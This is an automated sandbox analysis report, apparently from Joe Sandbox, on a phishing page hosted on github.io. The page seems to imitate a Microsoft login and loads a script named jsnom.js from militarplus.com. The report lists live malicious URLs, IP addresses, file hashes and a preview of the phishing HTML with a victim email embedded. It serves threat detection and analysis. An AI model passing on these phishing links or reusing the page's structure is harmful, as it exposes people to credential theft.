          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,1605369592726491557,6296709681448517168,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/100%Avira URL Cloudphishing
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://procustodiavalueslive.github.io/favicon.ico100%Avira URL Cloudphishing
          https://militarplus.com/m/jsnom.js100%Avira URL Cloudphishing
          https://militarplus.com/wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp100%Avira URL Cloudphishing
          https://militarplus.com/favicon.ico100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          procustodiavalueslive.github.io
          185.199.108.153
          truetrue
            unknown
            s-part-0016.t-0009.t-msedge.net
            13.107.246.44
            truefalse
              high
              d2vgu95hoyrpkh.cloudfront.net
              18.245.31.33
              truefalse
                unknown
                militarplus.com
                72.167.84.16
                truetrue
                  unknown
                  cs837.wac.edgecastcdn.net
                  192.229.133.221
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      sni1gl.wpc.omegacdn.net
                      152.199.21.175
                      truefalse
                        high
                        www.google.com
                        142.250.181.228
                        truefalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            www.w3schools.com
                            unknown
                            unknownfalse
                              high
                              cdn.socket.io
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://militarplus.com/favicon.icotrue
                                • Avira URL Cloud: phishing
                                unknown
                                http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/true
                                  unknown
                                  https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                    high
                                    https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/true
                                      unknown
                                      https://www.w3schools.com/w3css/4/w3.cssfalse
                                        high
                                        https://procustodiavalueslive.github.io/favicon.icofalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                          high
                                          https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.cotrue
                                            unknown
                                            https://militarplus.com/m/jsnom.jstrue
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://militarplus.com/wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webptrue
                                            • Avira URL Cloud: phishing
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_65.3.dr, chromecache_67.3.drfalse
                                              high
                                              https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_65.3.dr, chromecache_67.3.drfalse
                                                high
                                                https://twitter.com/githubstatuschromecache_69.3.drfalse
                                                  high
                                                  https://githubstatus.comchromecache_69.3.drfalse
                                                    high
                                                    https://google.comchromecache_65.3.dr, chromecache_67.3.drfalse
                                                      high
                                                      https://help.github.com/pages/chromecache_69.3.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        72.167.84.16
                                                        militarplus.comUnited States
                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                        18.245.31.78
                                                        unknownUnited States
                                                        16509AMAZON-02USfalse
                                                        18.245.31.33
                                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        192.229.133.221
                                                        cs837.wac.edgecastcdn.netUnited States
                                                        15133EDGECASTUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        142.250.181.228
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        152.199.21.175
                                                        sni1gl.wpc.omegacdn.netUnited States
                                                        15133EDGECASTUSfalse
                                                        185.199.108.153
                                                        procustodiavalueslive.github.ioNetherlands
                                                        54113FASTLYUStrue
                                                        185.199.110.153
                                                        unknownNetherlands
                                                        54113FASTLYUSfalse
                                                        IP
                                                        192.168.2.4
                                                        192.168.2.6
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1589342
                                                        Start date and time:2025-01-12 01:23:53 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 1s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:7
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.phis.win@18/43@22/11
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 216.58.206.35, 142.250.185.142, 142.250.110.84, 142.250.181.238, 142.250.186.46, 142.250.184.206, 142.250.186.170, 142.250.184.202, 142.250.185.170, 172.217.18.106, 142.250.185.106, 142.250.186.138, 142.250.181.234, 142.250.186.106, 142.250.185.202, 142.250.185.234, 172.217.16.138, 216.58.206.42, 142.250.186.74, 172.217.23.106, 142.250.186.42, 172.217.18.10, 199.232.214.172, 192.229.221.95, 142.250.185.110, 172.217.16.206, 142.250.186.110, 172.217.23.99, 142.250.184.234, 142.250.185.74, 216.58.206.74, 142.250.185.138, 216.58.212.170, 172.217.16.202, 142.250.185.131, 142.250.185.206, 142.250.186.142, 142.250.186.174, 2.23.242.162, 13.107.246.45, 4.175.87.197, 13.107.246.44
                                                        • Excluded domains from analysis (whitelisted): logincdn.msauth.net, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                        Category:dropped
                                                        Size (bytes):2407
                                                        Entropy (8bit):7.900400471609788
                                                        Encrypted:false
                                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                        Category:dropped
                                                        Size (bytes):276
                                                        Entropy (8bit):7.316609873335077
                                                        Encrypted:false
                                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):381
                                                        Entropy (8bit):5.603722971003312
                                                        Encrypted:false
                                                        SSDEEP:6:5mWxuJGzxBn3QHWzBLQHPKZGK/wAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BC:4WYcVBn9zBLQiZkAWOvfWLSsPZ45dWDI
                                                        MD5:520768CE6F8E3EC17A93C20E9193D153
                                                        SHA1:3689258BAB4DAE0162DD8C689D014C812BE179C9
                                                        SHA-256:0C60F9D2757CAB31DCDA450E5D71005609475BEEFF27A9AEB1E364DD87A3AADC
                                                        SHA-512:9C5995BD65CCA49DF2082BE5929359742D35EB585ABE338EA2E0F10AC4302ADF7805B72EC2D14F32DE63BBC1AEFD60140CB6709F2B4925E055E7AF484AAF7AF5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co
                                                        Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRTRNVEV5TURJMFZUTXdNVEV4T0RBNA==' vic='hd7qyd@vnjla.co' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):1636
                                                        Entropy (8bit):4.214613323368661
                                                        Encrypted:false
                                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:dropped
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (49854)
                                                        Category:dropped
                                                        Size (bytes):49993
                                                        Entropy (8bit):5.216475744251136
                                                        Encrypted:false
                                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                        Category:dropped
                                                        Size (bytes):199
                                                        Entropy (8bit):6.766983163126765
                                                        Encrypted:false
                                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                        MD5:21B761F2B1FD37F587D7222023B09276
                                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):23427
                                                        Entropy (8bit):5.112735417225198
                                                        Encrypted:false
                                                        SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                        MD5:BA0537E9574725096AF97C27D7E54F76
                                                        SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                        SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                        SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.w3schools.com/w3css/4/w3.css
                                                        Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:RIFF (little-endian) data, Web/P image
                                                        Category:downloaded
                                                        Size (bytes):21952
                                                        Entropy (8bit):6.000526798761754
                                                        Encrypted:false
                                                        SSDEEP:384:hnvlVsJ4cFGPn3+/tzr7QzUcpjaMO+XFsVjEEfkvVvFAEnea:tXs0+tr7syFAleEnea
                                                        MD5:6E06FCCD0F838022DE15659D2F992216
                                                        SHA1:954F0761FCBA03599AED418771AFB462245F67D0
                                                        SHA-256:A0084F2494BEF5E546D230E681B1502FC738975AEA4A1FD3E76E4E76C5913F66
                                                        SHA-512:5E9D8364431EFE94397AD36652B9660C24685989AF9BA7449CC15E117E4D207C7B290E0615DB7901FE9859D708A9DFBB39794F32312384FDA8E7DD12C48E5E2A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://militarplus.com/wp-content/uploads/2023/01/cropped-AF-Logo-Militar-Plus-04-1-32x32.webp
                                                        Preview:RIFF.U..WEBPVP8X..............VP8 .........* . .>=..C.!.... ......;....Ml...Gk....y..g..z<.C5......(q........C..`.........`..&.vz...j.K...8.N...W....N....0..........}].....8.......H..bEz..gw6^.>..E".....P.\..e...7;~...}.1`..q...~..2.S...%{U....@..6O$e....r.........2....W....F.k....9y.U..V......Uq.'.....k......#.Y.;.m4.........(.Z......e.Y........-.........P.S...]o..y.......z?...N..tl.g6..L..B.d..[aD.KR..c...}.$t>...|d1. ..P.+.O...|t..M.g..4A.$u.].#.+.._..+..$Bq/..\........./..|#.K)..0...XMP .S..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 79.159768, 2016/08/11-13:24:42 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://n
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):1636
                                                        Entropy (8bit):4.214613323368661
                                                        Encrypted:false
                                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):16
